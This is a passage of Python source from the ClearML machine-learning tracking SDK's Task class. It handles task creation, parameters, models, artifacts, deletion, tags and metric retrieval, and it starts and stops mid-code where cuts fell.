= result.script.get('entry_point') if result.script else None # check if we are running inside a module, then we should set our entry point # to the module call including all argv's result.script = ScriptInfo.detect_running_module(result.script) # Since we might run asynchronously, don't use self.data (let someone else # overwrite it before we have a chance to call edit) with self._edit_lock: self.reload() self.data.script = result.script self._edit(script=result.script) # if jupyter is present, requirements will be created in the background, when saving a snapshot if result.script and script_requirements: entry_point_filename = None if config.get('development.force_analyze_entire_repo', False) else \ os.path.join(result.script['working_dir'], entry_point) if config.get('development.detect_with_pip_freeze', False) or \ config.get('development.detect_with_conda_freeze', False): requirements, conda_requirements = pip_freeze( config.get('development.detect_with_conda_freeze', False)) requirements = '# Python ' + sys.version.replace('\n', ' ').replace('\r', ' ') + '\n\n'\ + requirements else: requirements, conda_requirements = script_requirements.get_requirements( entry_point_filename=entry_point_filename) if requirements: if not result.script['requirements']: result.script['requirements'] = {} result.script['requirements']['pip'] = requirements result.script['requirements']['conda'] = conda_requirements self._update_requirements(result.script.get('requirements') or '') # we do not want to wait for the check version thread, # because someone might wait for us to finish the repo detection update except SystemExit: pass except Exception as e: get_logger('task').debug(str(e)) def _auto_generate(self, project_name=None, task_name=None, task_type=TaskTypes.training): created_msg = make_message('Auto-generated at %(time)s UTC by %(user)s@%(host)s') if task_type.value not in (self.TaskTypes.training, self.TaskTypes.testing) and \ not Session.check_min_api_version('2.8'): print('WARNING: Changing task type to "{}" : ' 'clearml-server does not support task type "{}", ' 'please upgrade clearml-server.'.format(self.TaskTypes.training, task_type.value)) task_type = self.TaskTypes.training project_id = None if project_name: project_id = get_or_create_project(self, project_name, created_msg) tags = [self._development_tag] if not running_remotely() else [] extra_properties = {'system_tags': tags} if Session.check_min_api_version('2.3') else {'tags': tags} req = tasks.CreateRequest( name=task_name or make_message('Anonymous task (%(user)s@%(host)s %(time)s)'), type=tasks.TaskTypeEnum(task_type.value), comment=created_msg, project=project_id, input={'view': {}}, **extra_properties ) res = self.send(req) return res.response.id if res else 'offline-{}'.format(str(uuid4()).replace("-", "")) def _set_storage_uri(self, value): value = value.rstrip('/') if value else None self._storage_uri = StorageHelper.conform_url(value) self.data.output.destination = self._storage_uri self._edit(output_dest=self._storage_uri or ('' if Session.check_min_api_version('2.3') else None)) if self._storage_uri or self._output_model: self.output_model.upload_storage_uri = self._storage_uri @property def storage_uri(self): # type: () -> Optional[str] if self._storage_uri: return self._storage_uri if running_remotely(): return self.data.output.destination else: return None @storage_uri.setter def storage_uri(self, value): # type: (str) -> () self._set_storage_uri(value) @property def task_id(self): # type: () -> str return self.id @property def name(self): # type: () -> str return self.data.name or '' @name.setter def name(self, value): # type: (str) -> () self.set_name(value) @property def task_type(self): # type: () -> str return self.data.type @property def project(self): # type: () -> str return self.data.project @property def parent(self): # type: () -> str return self.data.parent @property def input_model_id(self): # type: () -> str return self.data.execution.model @property def output_model_id(self): # type: () -> str return self.data.output.model @property def comment(self): # type: () -> str return self.data.comment or '' @comment.setter def comment(self, value): # type: (str) -> () self.set_comment(value) @property def cache_dir(self): # type: () -> Path """ The cache directory which is used to store the Task related files. """ return Path(get_cache_dir()) / self.id @property def status(self): # type: () -> str """ The Task's status. To keep the Task updated. ClearML reloads the Task status information only, when this value is accessed. return str: TaskStatusEnum status """ return self.get_status() @property def _status(self): # type: () -> str """ Return the task's cached status (don't reload if we don't have to) """ return str(self.data.status) @property def input_model(self): # type: () -> Optional[Model] """ A model manager used to handle the input model object """ model_id = self._get_task_property('execution.model', raise_on_error=False) if not model_id: return None if self._input_model is None: self._input_model = Model( session=self.session, model_id=model_id, cache_dir=self.cache_dir, log=self.log, upload_storage_uri=None) return self._input_model @property def output_model(self): # type: () -> Optional[Model] """ A model manager used to manage the output model object """ if self._output_model is None: self._output_model = self._get_output_model(upload_required=True) return self._output_model def create_output_model(self): # type: () -> Model return self._get_output_model(upload_required=False, force=True) def reload(self): # type: () -> () """ Reload current Task's state from clearml-server. Refresh all task's fields, including artifacts / models / parameters etc. """ return super(Task, self).reload() def _get_output_model(self, upload_required=True, force=False, model_id=None): # type: (bool, bool, Optional[str]) -> Model return Model( session=self.session, model_id=model_id or (None if force else self._get_task_property( 'output.model', raise_on_error=False, log_on_error=False)), cache_dir=self.cache_dir, upload_storage_uri=self.storage_uri or self.get_output_destination( raise_on_error=upload_required, log_on_error=upload_required), upload_storage_suffix=self._get_output_destination_suffix('models'), log=self.log) @property def metrics_manager(self): # type: () -> Metrics """ A metrics manager used to manage the metrics related to this task """ return self._get_metrics_manager(self.get_output_destination()) @property def _reporter(self): # type: () -> Reporter """ Returns a simple metrics reporter instance. """ if self.__reporter is None: self._setup_reporter() return self.__reporter def _get_metrics_manager(self, storage_uri): # type: (str) -> Metrics if self._metrics_manager is None: self._metrics_manager = Metrics( session=self.session, task=self, storage_uri=storage_uri, storage_uri_suffix=self._get_output_destination_suffix('metrics'), iteration_offset=self.get_initial_iteration() ) return self._metrics_manager def _setup_reporter(self): # type: () -> Reporter try: storage_uri = self.get_output_destination(log_on_error=False) except ValueError: storage_uri = None self.__reporter = Reporter( metrics=self._get_metrics_manager(storage_uri=storage_uri), task=self) return self.__reporter def _get_output_destination_suffix(self, extra_path=None): # type: (Optional[str]) -> str return '/'.join(quote(x, safe="'[]{}()$^,.; -_+-=") for x in (self.get_project_name(), '%s.%s' % (self.name, self.data.id), extra_path) if x) def _reload(self): # type: () -> Any """ Reload the task object from the backend """ with self._edit_lock: if self._offline_mode: # noinspection PyBroadException try: with open((self.get_offline_mode_folder() / self._offline_filename).as_posix(), 'rt') as f: stored_dict = json.load(f) stored_data = tasks.Task(**stored_dict) # add missing entries for k, v in stored_dict.items(): if not hasattr(stored_data, k): setattr(stored_data, k, v) if stored_dict.get('project_name'): self._project_name = (None, stored_dict.get('project_name')) except Exception: stored_data = self._data return stored_data or tasks.Task( execution=tasks.Execution( parameters={}, artifacts=[], dataviews=[], model='', model_desc={}, model_labels={}, docker_cmd=''), output=tasks.Output()) if self._reload_skip_flag and self._data: return self._data res = self.send(tasks.GetByIdRequest(task=self.id)) return res.response.task def reset(self, set_started_on_success=True): # type: (bool) -> () """ Reset the task. Task will be reloaded following a successful reset. """ self.send(tasks.ResetRequest(task=self.id)) if set_started_on_success: self.started() elif self._data: # if not started, make sure the current cached state is synced self._data.status = self.TaskStatusEnum.created self.reload() def started(self, ignore_errors=True, force=False): # type: (bool, bool) -> () """ The signal that this Task started. """ return self.send(tasks.StartedRequest(self.id, force=force), ignore_errors=ignore_errors) def stopped(self, ignore_errors=True, force=False): # type: (bool, bool) -> () """ The signal that this Task stopped. """ return self.send(tasks.StoppedRequest(self.id, force=force), ignore_errors=ignore_errors) def completed(self, ignore_errors=True): # type: (bool) -> () """ The signal indicating that this Task completed. """ if hasattr(tasks, 'CompletedRequest') and callable(tasks.CompletedRequest): return self.send(tasks.CompletedRequest(self.id, status_reason='completed'), ignore_errors=ignore_errors) return self.send(tasks.StoppedRequest(self.id, status_reason='completed'), ignore_errors=ignore_errors) def mark_failed(self, ignore_errors=True, status_reason=None, status_message=None): # type: (bool, Optional[str], Optional[str]) -> () """ The signal that this Task stopped. """ return self.send(tasks.FailedRequest(self.id, status_reason=status_reason, status_message=status_message), ignore_errors=ignore_errors) def publish(self, ignore_errors=True): # type: (bool) -> () """ The signal that this Task will be published """ if str(self.status) != str(tasks.TaskStatusEnum.stopped): raise ValueError("Can't publish, Task is not stopped") resp = self.send(tasks.PublishRequest(self.id), ignore_errors=ignore_errors) assert isinstance(resp.response, tasks.PublishResponse) return resp def _delete( self, delete_artifacts_and_models=True, skip_models_used_by_other_tasks=True, raise_on_error=False, ): # type: (bool, bool, bool) -> bool """ Delete the task as well as it's output models and artifacts. Models and artifacts are deleted from their storage locations, each using its URI. Note: in order to delete models and artifacts using their URI, make sure the proper storage credentials are configured in your configuration file (e.g. if an artifact is stored in S3, make sure sdk.aws.s3.credentials are properly configured and that you have delete permission in the related buckets). :param delete_artifacts_and_models: If True, artifacts and models would also be deleted (default True) :param skip_models_used_by_other_tasks: If True, models used by other tasks would not be deleted (default True) :param raise_on_error: If True an exception will be raised when encountering an error. If False an error would be printed and no exception will be raised. :return: True if the task was deleted successfully. """ try: res = self.send(tasks.GetByIdRequest(self.task_id)) task = res.response.task if task.status == Task.TaskStatusEnum.published: if raise_on_error: raise self.DeleteError("Cannot delete published task {}".format(self.task_id)) self.log.error("Cannot delete published task {}".format(self.task_id)) return False execution = {} models_res = [] if delete_artifacts_and_models: execution = task.execution.to_dict() if task.execution else {} models_res = self.send( models.GetAllRequest( task=[task.id], only_fields=["id", "uri"] ) ).response.models event_uris = list(self._get_all_events( event_type="training_debug_image", unique_selector=itemgetter("url"), batch_size=10000 )) event_uris.extend(self._get_image_plot_uris()) task_deleted = self.send(tasks.DeleteRequest(self.task_id, force=True)) if not task_deleted: if raise_on_error: raise self.DeleteError("Failed deleting task {}".format(self.task_id)) self.log.error("Failed deleting task {}".format(self.task_id)) return False except self.DeleteError: raise except Exception as ex: if raise_on_error: raise self.DeleteError("Task deletion failed: {}".format(ex)) self.log.error("Task deletion failed: {}".format(ex)) return False failures = [] if delete_artifacts_and_models: for e in execution["artifacts"]: if e["mode"] == "output" and not self._delete_uri(e["uri"]): failures.append(e["uri"]) for m in models_res: # noinspection PyBroadException try: is_output_model = task.output and (m.id == task.output.model) res = self.send( models.DeleteRequest(m.id, force=(not skip_models_used_by_other_tasks)), ignore_errors=is_output_model ) # Should delete if model was deleted or if this was the output model (which was already deleted # by DeleteRequest, and it's URI is dangling should_delete = is_output_model or res.response.deleted except SendError as ex: if (ex.result.meta.result_code, ex.result.meta.result_subcode) == (400, 201): # Model not found, already deleted by DeleteRequest should_delete = True else: failures.append("model id: {}".format(m.id)) continue except Exception: failures.append("model id: {}".format(m.id)) continue if should_delete and not self._delete_uri(m.uri): failures.append(m.uri) event_uris = list(filter(None, event_uris)) for uri in event_uris: if not self._delete_uri(uri): failures.append(uri) failures = list(filter(None, failures)) if len(failures): error = "Failed deleting the following URIs:\n{}".format( "\n".join(failures) ) if raise_on_error: raise self.DeleteError(error) self.log.error(error) return task_deleted def _delete_uri(self, uri): # type: (str) -> bool # noinspection PyBroadException try: deleted = StorageHelper.get(uri).delete(uri) if deleted: self.log.debug("Deleted file: {}".format(uri)) return True except Exception as ex: self.log.error("Failed deleting {}: {}".format(uri, str(ex))) return False return False def _get_image_plot_uris(self): # type: () -> Set[str] def image_source_selector(d): plot = d.get("plot_str") if plot: # noinspection PyBroadException try: plot = json.loads(plot) return next( filter(None, (image.get("source") for image in plot.get("layout", {}).get("images", []))), None ) except Exception: pass return self._get_all_events( event_type="plot", unique_selector=image_source_selector, batch_size=10000 ) def update_model_desc(self, new_model_desc_file=None): # type: (Optional[str]) -> () """ Change the Task's model description. """ with self._edit_lock: self.reload() execution = self._get_task_property('execution') p = Path(new_model_desc_file) if not p.is_file(): raise IOError('mode_desc file %s cannot be found' % new_model_desc_file) new_model_desc = p.read_text() model_desc_key = list(execution.model_desc.keys())[0] if execution.model_desc else 'design' execution.model_desc[model_desc_key] = new_model_desc res = self._edit(execution=execution) return res.response def update_output_model(self, model_uri, name=None, comment=None, tags=None): # type: (str, Optional[str], Optional[str], Optional[Sequence[str]]) -> () """ Update the Task's output model. Use this method to update the output model when you have a local model URI, for example, storing the weights file locally, and specifying a ``file://path/to/file`` URI) .. important:: This method only updates the model's metadata using the API. It does not upload any data. :param model_uri: The URI of the updated model weights file. :type model_uri: str :param name: The updated model name. (Optional) :type name: str :param comment: The updated model description. (Optional) :type comment: str :param tags: The updated model tags. (Optional) :type tags: [str] """ self._conditionally_start_task() self._get_output_model(upload_required=False).update_for_task( uri=model_uri, task_id=self.id, name=name, comment=comment, tags=tags) def update_output_model_and_upload( self, model_file, # type: str name=None, # type: Optional[str] comment=None, # type: Optional[str] tags=None, # type: Optional[Sequence[str]] async_enable=False, # type: bool cb=None, # type: Optional[Callable[[Optional[bool]], bool]] iteration=None, # type: Optional[int] ): # type: (...) -> str """ Update the Task's output model weights file. First, ClearML uploads the file to the preconfigured output destination (see the Task's ``output.destination`` property or call the ``setup_upload`` method), then ClearML updates the model object associated with the Task an API call. The API call uses with the URI of the uploaded file, and other values provided by additional arguments. :param str model_file: The path to the updated model weights file. :param str name: The updated model name. (Optional) :param str comment: The updated model description. (Optional) :param list tags: The updated model tags. (Optional) :param bool async_enable: Request asynchronous upload - ``True`` - The API call returns immediately, while the upload and update are scheduled in another thread. - ``False`` - The API call blocks until the upload completes, and the API call updating the model returns. (default) :param callable cb: Asynchronous callback. A callback. If ``async_enable`` is set to ``True``, this is a callback that is invoked once the asynchronous upload and update complete. :param int iteration: iteration number for the current stored model (Optional) :return: The URI of the uploaded weights file. If ``async_enable`` is set to ``True``, this is the expected URI, as the upload is probably still in progress. """ self._conditionally_start_task() uri = self.output_model.update_for_task_and_upload( model_file, self.id, name=name, comment=comment, tags=tags, async_enable=async_enable, cb=cb, iteration=iteration ) return uri def _conditionally_start_task(self): # type: () -> () if str(self.status) == str(tasks.TaskStatusEnum.created): self.started() @property def labels_stats(self): # type: () -> dict """ Get accumulated label stats for the current/last frames iteration """ return self._curr_label_stats def _accumulate_label_stats(self, roi_stats, reset=False): # type: (dict, bool) -> () if reset: self._curr_label_stats = {} for label in roi_stats: if label in self._curr_label_stats: self._curr_label_stats[label] += roi_stats[label] else: self._curr_label_stats[label] = roi_stats[label] def set_input_model(self, model_id=None, model_name=None, update_task_design=True, update_task_labels=True): # type: (str, Optional[str], bool, bool) -> () """ Set a new input model for the Task. The model must be "ready" (status is ``Published``) to be used as the Task's input model. :param model_id: The Id of the model on the **ClearML Server** (backend). If ``model_name`` is not specified, then ``model_id`` must be specified. :param model_name: The model name. The name is used to locate an existing model in the **ClearML Server** (backend). If ``model_id`` is not specified, then ``model_name`` must be specified. :param update_task_design: Update the Task's design - ``True`` - ClearML copies the Task's model design from the input model. - ``False`` - ClearML does not copy the Task's model design from the input model. :param update_task_labels: Update the Task's label enumeration - ``True`` - ClearML copies the Task's label enumeration from the input model. - ``False`` - ClearML does not copy the Task's label enumeration from the input model. """ if model_id is None and not model_name: raise ValueError('Expected one of [model_id, model_name]') if model_name: # Try getting the model by name. Limit to 10 results. res = self.send( models.GetAllRequest( name=exact_match_regex(model_name), ready=True, page=0, page_size=10, order_by=['-created'], only_fields=['id', 'created'] ) ) model = get_single_result(entity='model', query=model_name, results=res.response.models, log=self.log) model_id = model.id if model_id: res = self.send(models.GetByIdRequest(model=model_id)) model = res.response.model if not model.ready: # raise ValueError('Model %s is not published (not ready)' % model_id) self.log.debug('Model %s [%s] is not published yet (not ready)' % (model_id, model.uri)) else: # clear the input model model = None model_id = '' with self._edit_lock: self.reload() # store model id self.data.execution.model = model_id # Auto populate input field from model, if they are empty if update_task_design and not self.data.execution.model_desc: self.data.execution.model_desc = model.design if model else '' if update_task_labels and not self.data.execution.model_labels: self.data.execution.model_labels = model.labels if model else {} self._edit(execution=self.data.execution) def get_parameters(self, backwards_compatibility=True): # type: (bool) -> (Optional[dict]) """ Get the parameters for a Task. This method returns a complete group of key-value parameter pairs, but does not support parameter descriptions (the result is a dictionary of key-value pairs). Notice the returned parameter dict is flat: i.e. {'Args/param': 'value'} is the argument "param" from section "Args" :param backwards_compatibility: If True (default) parameters without section name (API version < 2.9, clearml-server < 0.16) will be at dict root level. If False, parameters without section name, will be nested under "Args/" key. :return: dict of the task parameters, all flattened to key/value. Different sections with key prefix "section/" """ if not Session.check_min_api_version('2.9'): return self._get_task_property('execution.parameters') # API will makes sure we get old parameters with type legacy on top level (instead of nested in Args) parameters = dict() hyperparams = self._get_task_property('hyperparams') or {} if not backwards_compatibility: for section in hyperparams: for key, section_param in hyperparams[section].items(): parameters['{}/{}'.format(section, key)] = section_param.value else: for section in hyperparams: for key, section_param in hyperparams[section].items(): if section_param.type == 'legacy' and section in (self._legacy_parameters_section_name, ): parameters['{}'.format(key)] = section_param.value else: parameters['{}/{}'.format(section, key)] = section_param.value return parameters def set_parameters(self, *args, **kwargs): # type: (*dict, **Any) -> () """ Set the parameters for a Task. This method sets a complete group of key-value parameter pairs, but does not support parameter descriptions (the input is a dictionary of key-value pairs). Notice the parameter dict is flat: i.e. {'Args/param': 'value'} will set the argument "param" in section "Args" to "value" :param args: Positional arguments, which are one or more dictionary or (key, value) iterable. They are merged into a single key-value pair dictionary. :param kwargs: Key-value pairs, merged into the parameters dictionary created from ``args``. """ return self._set_parameters(*args, __update=False, **kwargs) def _set_parameters(self, *args, **kwargs): # type: (*dict, **Any) -> () """ Set the parameters for a Task. This method sets a complete group of key-value parameter pairs, but does not support parameter descriptions (the input is a dictionary of key-value pairs). :param args: Positional arguments, which are one or more dictionary or (key, value) iterable. They are merged into a single key-value pair dictionary. :param kwargs: Key-value pairs, merged into the parameters dictionary created from ``args``. """ def stringify(value): # return empty string if value is None if value is None: return "" str_value = str(value) if isinstance(value, (tuple, list, dict)) and 'None' in re.split(r'[ ,\[\]{}()]', str_value): # If we have None in the string we have to use json to replace it with null, # otherwise we end up with None as string when running remotely try: str_json = json.dumps(value) # verify we actually have a null in the string, otherwise prefer the str cast # This is because we prefer to have \' as in str and not \" used in json if 'null' in re.split(r'[ ,\[\]{}()]', str_json): return str_json except TypeError: # if we somehow failed to json serialize, revert to previous std casting pass return str_value if not all(isinstance(x, (dict, Iterable)) for x in args): raise ValueError('only dict or iterable are supported as positional arguments') prefix = kwargs.pop('__parameters_prefix', None) descriptions = kwargs.pop('__parameters_descriptions', None) or dict() params_types = kwargs.pop('__parameters_types', None) or dict() update = kwargs.pop('__update', False) # new parameters dict new_parameters = dict(itertools.chain.from_iterable(x.items() if isinstance(x, dict) else x for x in args)) new_parameters.update(kwargs) if prefix: prefix = prefix.strip('/') new_parameters = dict(('{}/{}'.format(prefix, k), v) for k, v in new_parameters.items()) # verify parameters type: not_allowed = { k: type(v).__name__ for k, v in new_parameters.items() if not verify_basic_type(v, self._parameters_allowed_types) } if not_allowed: self.log.warning( "Skipping parameter: {}, only builtin types are supported ({})".format( ', '.join('%s[%s]' % p for p in not_allowed.items()), ', '.join(t.__name__ for t in self._parameters_allowed_types)) ) new_parameters = {k: v for k, v in new_parameters.items() if k not in not_allowed} use_hyperparams = Session.check_min_api_version('2.9') with self._edit_lock: self.reload() # if we have a specific prefix and we use hyperparameters, and we use set. # overwrite only the prefix, leave the rest as is. if not update and prefix: parameters = copy(self.get_parameters() or {}) parameters = dict((k, v) for k, v in parameters.items() if not k.startswith(prefix+'/')) elif update: parameters = copy(self.get_parameters() or {}) else: parameters = dict() parameters.update(new_parameters) # force cast all variables to strings (so that we can later edit them in UI) parameters = {k: stringify(v) for k, v in parameters.items()} if use_hyperparams: # build nested dict from flat parameters dict: org_hyperparams = self.data.hyperparams or {} hyperparams = dict() # if the task is a legacy task, we should put everything back under Args/key with legacy type legacy_name = self._legacy_parameters_section_name org_legacy_section = org_hyperparams.get(legacy_name, dict()) for k, v in parameters.items(): # legacy variable if org_legacy_section.get(k, tasks.ParamsItem()).type == 'legacy': section = hyperparams.get(legacy_name, dict()) section[k] = copy(org_legacy_section[k]) section[k].value = str(v) if v else v description = descriptions.get(k) if description: section[k].description = description hyperparams[legacy_name] = section continue org_k = k if '/' not in k: k = '{}/{}'.format(self._default_configuration_section_name, k) section_name, key = k.split('/', 1) section = hyperparams.get(section_name, dict()) org_param = org_hyperparams.get(section_name, dict()).get(key, tasks.ParamsItem()) param_type = params_types[org_k] if org_k in params_types else org_param.type if param_type and not isinstance(param_type, str): param_type = param_type.__name__ if hasattr(param_type, '__name__') else str(param_type) section[key] = tasks.ParamsItem( section=section_name, name=key, value=str(v) if v else v, description=descriptions[org_k] if org_k in descriptions else org_param.description, type=param_type, ) hyperparams[section_name] = section self._edit(hyperparams=hyperparams) self.data.hyperparams = hyperparams else: execution = self.data.execution if execution is None: execution = tasks.Execution( parameters=parameters, artifacts=[], dataviews=[], model='', model_desc={}, model_labels={}, docker_cmd='') else: execution.parameters = parameters self._edit(execution=execution) def set_parameter(self, name, value, description=None, value_type=None): # type: (str, str, Optional[str], Optional[Any]) -> () """ Set a single Task parameter. This overrides any previous value for this parameter. :param name: The parameter name. :param value: The parameter value. :param description: The parameter description. :param value_type: The type of the parameters (cast to string and store) """ if not Session.check_min_api_version('2.9'): # not supported yet description = None value_type = None self._set_parameters( {name: value}, __update=True, __parameters_descriptions={name: description}, __parameters_types={name: value_type} ) def get_parameter(self, name, default=None): # type: (str, Any) -> Any """ Get a value for a parameter. :param name: Parameter name :param default: Default value :return: The Parameter value (or default value if parameter is not defined). """ params = self.get_parameters() return params.get(name, default) def delete_parameter(self, name): # type: (str) -> bool """ Delete a parameter byt it's full name Section/name. :param name: Parameter name in full, i.e. Section/name. For example, 'Args/batch_size' :return: True if the parameter was deleted successfully """ if not Session.check_min_api_version('2.9'): raise ValueError("Delete hyper parameter is not supported by your clearml-server, " "upgrade to the latest version") with self._edit_lock: paramkey = tasks.ParamKey(section=name.split('/', 1)[0], name=name.split('/', 1)[1]) res = self.send(tasks.DeleteHyperParamsRequest( task=self.id, hyperparams=[paramkey]), raise_on_errors=False) self.reload() return res.ok() def update_parameters(self, *args, **kwargs): # type: (*dict, **Any) -> () """ Update the parameters for a Task. This method updates a complete group of key-value parameter pairs, but does not support parameter descriptions (the input is a dictionary of key-value pairs). Notice the parameter dict is flat: i.e. {'Args/param': 'value'} will set the argument "param" in section "Args" to "value" :param args: Positional arguments, which are one or more dictionary or (key, value) iterable. They are merged into a single key-value pair dictionary. :param kwargs: Key-value pairs, merged into the parameters dictionary created from ``args``. """ self._set_parameters(*args, __update=True, **kwargs) def set_model_label_enumeration(self, enumeration=None): # type: (Mapping[str, int]) -> () """ Set a dictionary of labels (text) to ids (integers) {str(label): integer(id)} :param dict enumeration: For example: {str(label): integer(id)} """ enumeration = enumeration or {} with self._edit_lock: self.reload() execution = self.data.execution if enumeration is None: return if not (isinstance(enumeration, dict) and all(isinstance(k, six.string_types) and isinstance(v, int) for k, v in enumeration.items())): raise ValueError('Expected label to be a dict[str => int]') execution.model_labels = enumeration self._edit(execution=execution) def _set_default_docker_image(self): # type: () -> () if not DOCKER_IMAGE_ENV_VAR.exists(): return self.set_base_docker(DOCKER_IMAGE_ENV_VAR.get(default="")) def set_base_docker(self, docker_cmd): # type: (str) -> () """ Set the base docker image for this experiment If provided, this value will be used by clearml-agent to execute this experiment inside the provided docker image. When running remotely the call is ignored """ if not self.running_locally(): return with self._edit_lock: self.reload() execution = self.data.execution execution.docker_cmd = docker_cmd self._edit(execution=execution) def get_base_docker(self): # type: () -> str """Get the base Docker command (image) that is set for this experiment.""" return self._get_task_property('execution.docker_cmd', raise_on_error=False, log_on_error=False) def set_artifacts(self, artifacts_list=None): # type: (Sequence[tasks.Artifact]) -> () """ List of artifacts (tasks.Artifact) to update the task :param list artifacts_list: list of artifacts (type tasks.Artifact) """ if not Session.check_min_api_version('2.3'): return False if not (isinstance(artifacts_list, (list, tuple)) and all(isinstance(a, tasks.Artifact) for a in artifacts_list)): raise ValueError('Expected artifacts to [tasks.Artifacts]') with self._edit_lock: self.reload() execution = self.data.execution keys = [a.key for a in artifacts_list] execution.artifacts = [a for a in execution.artifacts or [] if a.key not in keys] + artifacts_list self._edit(execution=execution) def _set_model_design(self, design=None): # type: (str) -> () with self._edit_lock: self.reload() if Session.check_min_api_version('2.9'): configuration = self._get_task_property( "configuration", default={}, raise_on_error=False, log_on_error=False) or {} configuration[self._default_configuration_section_name] = tasks.ConfigurationItem( name=self._default_configuration_section_name, value=str(design)) self._edit(configuration=configuration) else: execution = self.data.execution if design is not None: # noinspection PyProtectedMember execution.model_desc = Model._wrap_design(design) self._edit(execution=execution) def get_labels_enumeration(self): # type: () -> Mapping[str, int] """ Get the label enumeration dictionary label enumeration dictionary of string (label) to integer (value) pairs. :return: A dictionary containing the label enumeration. """ if not self.data or not self.data.execution: return {} return self.data.execution.model_labels def get_model_design(self): # type: () -> str """ Get the model configuration as blob of text. :return: The model configuration as blob of text. """ if Session.check_min_api_version('2.9'): design = self._get_task_property( "configuration", default={}, raise_on_error=False, log_on_error=False) or {} if design: design = design.get(sorted(design.keys())[0]).value or '' else: design = self._get_task_property( "execution.model_desc", default={}, raise_on_error=False, log_on_error=False) # noinspection PyProtectedMember return Model._unwrap_design(design) def set_output_model_id(self, model_id): # type: (str) -> () self.data.output.model = str(model_id) self._edit(output=self.data.output) def get_random_seed(self): # type: () -> int # fixed seed for the time being return 1337 def set_random_seed(self, random_seed): # type: (int) -> () # fixed seed for the time being pass def set_project(self, project_id=None, project_name=None): # type: (Optional[str], Optional[str]) -> () # if running remotely and we are the main task, skip setting ourselves. if self._is_remote_main_task(): return if not project_id: assert isinstance(project_name, six.string_types) res = self.send(projects.GetAllRequest(name=exact_match_regex(project_name)), raise_on_errors=False) if not res or not res.response or not res.response.projects or len(res.response.projects) != 1: return False project_id = res.response.projects[0].id assert isinstance(project_id, six.string_types) self._set_task_property("project", project_id) self._edit(project=project_id) def get_project_name(self): # type: () -> Optional[str] if self.project is None: return self._project_name[1] if self._project_name and len(self._project_name) > 1 else None if self._project_name and self._project_name[1] is not None and self._project_name[0] == self.project: return self._project_name[1] res = self.send(projects.GetByIdRequest(project=self.project), raise_on_errors=False) if not res or not res.response or not res.response.project: return None self._project_name = (self.project, res.response.project.name) return self._project_name[1] def get_tags(self): # type: () -> Sequence[str] return self._get_task_property("tags") def set_system_tags(self, tags): # type: (Sequence[str]) -> () assert isinstance(tags, (list, tuple)) if Session.check_min_api_version('2.3'): self._set_task_property("system_tags", tags) self._edit(system_tags=self.data.system_tags) else: self._set_task_property("tags", tags) self._edit(tags=self.data.tags) def get_system_tags(self): # type: () -> Sequence[str] return self._get_task_property("system_tags" if Session.check_min_api_version('2.3') else "tags") def set_tags(self, tags): # type: (Sequence[str]) -> () assert isinstance(tags, (list, tuple)) if not Session.check_min_api_version('2.3'): # not supported return self._set_task_property("tags", tags) self._edit(tags=self.data.tags) def set_name(self, name): # type: (str) -> () """ Set the Task name. :param name: The name of the Task. :type name: str """ self._set_task_property("name", str(name)) self._edit(name=self.data.name) def set_parent(self, parent): # type: (Optional[Union[str, Task]]) -> () """ Set the parent task for the Task. :param parent: The parent task id (or parent Task object) for the Task. Set None for no parent. :type parent: str or Task """ if parent: assert isinstance(parent, (str, Task)) if isinstance(parent, Task): parent = parent.parent assert parent != self.id self._set_task_property("parent", str(parent) if parent else None) self._edit(parent=self.data.parent) def set_comment(self, comment): # type: (str) -> () """ Set a comment / description for the Task. :param comment: The comment / description for the Task. :type comment: str """ self._set_task_property("comment", str(comment)) self._edit(comment=comment) def set_task_type(self, task_type): # type: (Union[str, Task.TaskTypes]) -> () """ Set the task_type for the Task. :param task_type: The task_type of the Task (see optional values in TaskTypes). :type task_type: str or TaskTypes """ if not isinstance(task_type, self.TaskTypes): task_type = self.TaskTypes(task_type) self._set_task_property("task_type", str(task_type)) self._edit(type=task_type) def set_archived(self, archive): # type: (bool) -> () """ Archive the Task or remove it from the archived folder. :param archive: If True archive the Task, If False make sure it is removed from the archived folder """ with self._edit_lock: system_tags = list(set(self.get_system_tags()) | {self.archived_tag}) \ if archive else list(set(self.get_system_tags()) - {self.archived_tag}) self.set_system_tags(system_tags) def get_archived(self): # type: () -> bool """ Return the Archive state of the Task :return: If True the Task is archived, otherwise it is not. """ return self.archived_tag in self.get_system_tags() def set_initial_iteration(self, offset=0): # type: (int) -> int """ Set the initial iteration offset. The default value is ``0``. This method is useful when continuing training from previous checkpoints. For example, to start on iteration 100000, including scalars and plots: ..code-block:: py task.set_initial_iteration(100000) Task.set_initial_iteration(100000) :param int offset: Initial iteration (at starting point) :return: A newly set initial offset. """ if not isinstance(offset, int): raise ValueError("Initial iteration offset must be an integer") self._initial_iteration_offset = offset if self._metrics_manager: self._metrics_manager.set_iteration_offset(self._initial_iteration_offset) return self._initial_iteration_offset def get_initial_iteration(self): # type: () -> int """ Get the initial iteration offset. The default value is ``0``. This method is useful when continuing training from previous checkpoints. :return: The initial iteration offset. """ return self._initial_iteration_offset def get_status(self): # type: () -> str """ Return The task status without refreshing the entire Task object object (only the status property) TaskStatusEnum: ["created", "in_progress", "stopped", "closed", "failed", "completed", "queued", "published", "publishing", "unknown"] :return: str: Task status as string (TaskStatusEnum) """ status = self._get_status()[0] if self._data: self._data.status = status return str(status) def get_output_log_web_page(self): # type: () -> str """ Return the Task results & outputs web page address. For example: https://demoapp.demo.clear.ml/projects/216431/experiments/60763e04/output/log :return: http/s URL link. """ return '{}/projects/{}/experiments/{}/output/log'.format( self._get_app_server(), self.project if self.project is not None else '*', self.id, ) def get_reported_scalars( self, max_samples=0, # type: int x_axis='iter' # type: str ): # type: (...) -> Mapping[str, Mapping[str, Mapping[str, Sequence[float]]]] """ Return a nested dictionary for the scalar graphs, where the first key is the graph title and the second is the series name. Value is a dict with 'x': values and 'y': values .. note:: This call is not cached, any call will retrieve all the scalar reports from the back-end. If the Task has many scalars reported, it might take long for the call to return. Example: .. code-block:: py {'title': {'series': { 'x': [0, 1 ,2], 'y': [10, 11 ,12], }}} :param int max_samples: Maximum samples per series to return. Default is 0 returning all scalars. With sample limit, average scalar values inside sampling window. :param str x_axis: scalar x_axis, possible values: 'iter': iteration (default), 'timestamp': seconds from start, 'iso_time': absolute time :return: dict: Nested scalar graphs: dict[title(str), dict[series(str), dict[axis(str), list(float)]]] """ if x_axis not in ('iter', 'timestamp', 'iso_time'): raise ValueError("Scalar x-axis supported values are: 'iter', 'timestamp', 'iso_time'") # send request res = self.send( events.ScalarMetricsIterHistogramRequest( task=self.id, key=x_axis, samples=max(1, max_samples) if max_samples else None), raise_on_errors=False, ignore_errors=True, ) if not res: return {} response = res.wait() if not 